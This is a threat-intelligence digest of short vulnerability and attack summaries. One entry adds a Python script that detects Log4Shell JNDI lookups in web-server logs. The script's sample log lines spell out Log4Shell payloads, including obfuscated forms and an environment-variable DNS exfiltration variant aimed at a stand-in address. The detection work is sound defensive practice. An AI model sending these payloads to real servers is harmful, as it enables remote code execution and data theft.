Heimdal addresses multiple vulnerabilities in v7.7.1
Vulnerability Report. Summary: Heimdal has addressed bugs in the Heimdal KDC. A remote attacker can use unwrap_des3() to trigger a buffer overflow in Heimdal's GSSAPI library, leading to a denial of service or remote code …
RCE flaw in F5 BIG-IP and BIG-IQ
Vulnerability Report. Summary: Two security flaws in F5 BIG-IP and BIG-IQ can be exploited to achieve remote code execution. An adversary could gain persistent root access to the device's management interface by successfully exploiting …
New Venus ransomware targets the healthcare industry
Attack Report. Summary: Venus ransomware, also called Goodgame, has been a source of concern since August 2022. It is an example of the legacy ransomware model: a standalone package sold on underground markets …
Iranian hackers leveraged Log4Shell to penetrate US federal agency
Attack Report. Summary: Iranian APT activity was detected on a federal agency's network. The intruders used an exploit for Log4Shell (CVE-2021-44228) against an unpatched VMware Horizon server to install XMRig cryptomining software. …
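The intrusion summarised above depends on a `${jndi:...}` lookup string reaching a vulnerable Log4j 2 logger, typically through an HTTP header or URL that the application logs. As an added example (not code from the report or from any vendor), the Python below scans web-server log lines for such lookups. It first undoes the obfuscations attackers use to dodge a naive `${jndi:` grep (the `${lower:j}`/`${upper:j}` case lookups, the `${::-j}` and `${env:X:-j}` default-value tricks, and URL encoding) and then reports the scheme and target of every JNDI lookup it finds. The log lines, hostnames and the lookup names it resolves are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookups in web-server log lines.

Added example: normalises the common Log4j lookup obfuscations, then matches
on ${jndi:<scheme>:...}. Sample lines and addresses are constructed.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed Apache combined-log style lines (documentation address ranges).
SAMPLE_LOGS: List[str] = [
    '10.0.0.5 - - [15/Nov/2022:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Nov/2022:10:01:13 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:14 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:15 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:16 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:BARFOO:-j}ndi:${env:BARFOO:-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:17 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${JNDI:LDAP://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:18 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:dns://${env:HOSTNAME}.198.51.100.7/x}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:19 +0000] "GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.85"',
    '10.0.0.12 - - [15/Nov/2022:10:01:20 +0000] "GET /api/price?sym=${ticker} HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

# Innermost ${...} with no nested lookup inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:<scheme>://<target>...}; the scheme prefix is matched case-insensitively,
# as Log4j 2 resolves lookup prefixes without regard to case.
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):(?://)?([^/}]+)", re.IGNORECASE)


def _resolve(m) -> str:
    """Evaluate one innermost lookup the way the Log4j 2 interpolator would."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                      # keep: this is what we alert on
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()    # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()    # ${upper:j} -> J
    if ":-" in body:
        return body.split(":-", 1)[1]          # ${env:NOPE:-j} and ${::-j} -> j
    return "<" + body + ">"                    # other lookups become a placeholder


def normalize(line: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, line)
        if new == line:
            return new
        line = new
    return line


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per JNDI lookup found, with the normalised payload for triage."""
    hits: List[Dict[str, object]] = []
    for idx, raw in enumerate(lines):
        norm = normalize(unquote(raw))          # URL-decode first: request lines are stored encoded
        for m in _JNDI.finditer(norm):
            hits.append({
                "line": idx,
                "scheme": m.group(1).lower(),
                "target": m.group(2),
                "normalized": norm,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['target']}")
```

The placeholder step matters for the exfiltration variant (line 6 above), where the attacker nests `${env:...}` inside the JNDI target to leak environment variables via DNS: the inner lookup is rewritten to `<env:HOSTNAME>` so the outer `${jndi:` still surfaces with the leaked name visible in `target`. The normaliser only covers the lookups listed in its comments; other lookup prefixes and whitespace tricks are not resolved, so treat a hit as a strong indicator and a miss as inconclusive.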
Typhon Stealer is back with a new variant named Typhon Reborn
Attack Report. Summary: Typhon Stealer, malware known for stealing cryptocurrency wallets, logging keystrokes and evading antivirus products, first became widely known in early August 2022. Soon after, they …
DTrack backdoor campaigns target European organizations
Attack Report. Summary: DTrack, malware developed by the Lazarus group, is a flexible backdoor that deploys its payload in stages. It is distributed under filenames commonly used by legitimate executables. The backdoor …
Billbug returns after two years to conduct an espionage campaign
Actor Report. Summary: After being widely active in 2018-2019, Billbug, a Chinese state-sponsored group, is back after almost two years. They have been attacking multiple government agencies in an Asian country since …
BumbleBee leverages Zerologon to gain Domain Controller access
Attack Report. Summary: Since May 2022, threat actors have been using BumbleBee as an initial access vector delivered through a contact-form campaign. The intrusion started with the delivery of an ISO file that contained an LNK …
BATLOADER: evasive malware leverages SEO poisoning
Attack Report. Summary: The BatLoader dropper is used to deliver a range of malware to victim devices, including a banking Trojan, an information stealer and the Cobalt Strike post-exploitation toolkit. BatLoader operators utilize …
KmsdBot cryptominer targets the gaming industry
Attack Report. Summary: KmsdBot is Golang-based malware that gains access to targeted systems over SSH, using weak login credentials, in order to mine cryptocurrency and carry out distributed denial-of-service (DDoS) attacks. The malware supports …